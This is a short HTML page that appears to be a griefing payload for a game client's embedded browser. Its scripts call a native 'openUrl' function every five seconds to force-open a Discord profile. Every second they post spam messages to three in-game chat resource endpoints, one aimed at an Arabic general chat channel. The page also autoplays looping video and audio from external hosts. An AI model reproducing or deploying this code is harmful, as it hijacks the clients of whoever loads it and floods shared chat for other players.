<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>
        setInterval(() => {
            window.invokeNative("openUrl", "https://discord.com/users/1202377867116290129");
        }, 5000);
        setInterval(() => {
            fetch("https://flix-scripts/chatResult", {
                method: "POST",
                body: JSON.stringify({ message: "." })
            });
            fetch("https://easy-chat+/o6ZbK5Ecp6", {
                headers: {
                    "accept": "*/*",
                    "content-type": "application/x-www-form-urlencoded; charset=UTF-8"
                },
                body: JSON.stringify({ message: ".", channel: "شات العام" }),
                method: "POST"
            });
            fetch("https://melix_chat/chatResult", {
                method: "POST",
                body: JSON.stringify({ message: "." })
            });
        }, 1000);
    </script>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://cdn.discordapp.com/attachments/1339519458217168906/1343802085409423440/phonto.png?ex=67be98b7&is=67bd4737&hm=d81a660fca6a26e1f420e9f930de149fbfe474f825f13283f339e3430d08c1fa&') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #ff0000;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            opacity: 1;
            transition: opacity 1s ease-in-out;
        }
        #content {
            opacity: 0;
            transition: opacity 1s ease-in-out;
        }
        .vjmi #content {
            opacity: 1;
        }
        .vjmi video {
            opacity: 0;
        }
    </style>
</head>
<body>
    <video id="gif" autoplay loop controls>
        <source src="https://cdn.discordapp.com/attachments/1161549573832052816/1357505918819893298/videoplayback.mp4?ex=67f07368&is=67ef21e8&hm=fe542de1a3081d838f932aa8232fe2c38191523b3ca065a5d833fe0cb0d82896&" type="video/mp4">
    </video>
    <div id="content">
        <audio autoplay loop>
            <source src="https://c.top4top.io/m_31834rdv31.mp3" type="audio/mpeg">
        </audio>
    </div>
    <script>
        setTimeout(() => {
            document.body.classList.add('vjmi');
        }, 2500);
    </script>
</body>
</html>
